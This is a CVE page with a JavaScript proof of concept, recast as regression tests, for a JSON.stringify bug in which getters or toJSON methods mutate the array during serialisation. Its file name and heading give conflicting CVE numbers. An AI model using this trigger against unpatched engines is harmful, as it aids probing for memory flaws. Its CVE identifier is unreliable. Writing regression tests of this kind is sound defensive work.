CVE-2015-8548.md


CVE-2015-8584

  • Date: Nov 2015
  • Credit: ??

PoC

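// Regression checks for JSON.stringify() on an array that is modified from
// inside the serialisation itself. Every case stores an object in the array
// whose toJSON method or `value` getter changes the array (truncate, pop,
// delete, or grow) while JSON.stringify is still walking it, then compares
// the produced text with the expected string.
//
// The expected strings correspond to the array length being taken once before
// iteration and each element being read when its index is reached: elements
// that no longer exist serialise as null, and elements added past the
// original length are not emitted.
//
// NOTE(review): the page does not describe the root cause; presumably the
// affected engine kept using array state captured before the callback ran.
// Run this against a patched build as a regression check.
// NOTE(review): this page's file name says CVE-2015-8548 while its heading
// says CVE-2015-8584 — confirm which identifier applies.

/**
 * Serialises `value` and throws if the text differs from `expected`.
 * The original snippet evaluated `expected == JSON.stringify(...)` and threw
 * the result away, so a wrong serialisation went unreported.
 *
 * @param {string} expected - exact JSON text the engine must produce
 * @param {*} value - value handed to JSON.stringify
 * @throws {Error} when the produced text is not identical to `expected`
 */
function expectJson(expected, value) {
  const actual = JSON.stringify(value);
  if (actual !== expected) {
    throw new Error(
      `JSON.stringify mismatch: expected ${expected}, got ${actual}`
    );
  }
}

/**
 * Builds the ten-element array [0..9] by indexed stores into an empty array
 * literal, the same way the original snippet filled it.
 *
 * @returns {number[]} a new array holding 0 through 9
 */
function numberedArray() {
  const fresh = [];
  for (let i = 0; i < 10; i++) fresh[i] = i;
  return fresh;
}

// `var` is kept for these two names so the snippet can be evaluated more than
// once in the same shell session without a redeclaration error. The callbacks
// below close over `array`, so it must be the array being serialised.
var array;
var funky;

// toJSON on element 0 truncates the array to one element.
array = numberedArray();
funky = {
  toJSON() { array.length = 1; return "funky"; }
};
array[0] = funky;
expectJson('["funky",null,null,null,null,null,null,null,null,null]', array);

// Getter on element 3 truncates the array to one element.
array = numberedArray();
funky = {
  get value() { array.length = 1; return "funky"; }
};
array[3] = funky;
expectJson('[0,1,2,{"value":"funky"},null,null,null,null,null,null]', array);

// Getter removes the last element with pop().
array = numberedArray();
funky = {
  get value() { array.pop(); return "funky"; }
};
array[3] = funky;
expectJson('[0,1,2,{"value":"funky"},4,5,6,7,8,null]', array);

// Getter deletes the last element, leaving a hole at the end.
array = numberedArray();
funky = {
  get value() { delete array[9]; return "funky"; }
};
array[3] = funky;
expectJson('[0,1,2,{"value":"funky"},4,5,6,7,8,null]', array);

// Getter deletes an element in the middle, leaving a hole at index 6.
array = numberedArray();
funky = {
  get value() { delete array[6]; return "funky"; }
};
array[3] = funky;
expectJson('[0,1,2,{"value":"funky"},4,5,null,7,8,9]', array);

// Getter stores just past the original length; the new element is not emitted.
array = numberedArray();
funky = {
  get value() { array[12] = 12; return "funky"; }
};
array[3] = funky;
expectJson('[0,1,2,{"value":"funky"},4,5,6,7,8,9]', array);

// Getter stores at a very large index; the output is still the original ten.
array = numberedArray();
funky = {
  get value() { array[10000000] = 12; return "funky"; }
};
array[3] = funky;
expectJson('[0,1,2,{"value":"funky"},4,5,6,7,8,9]', array);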

Reference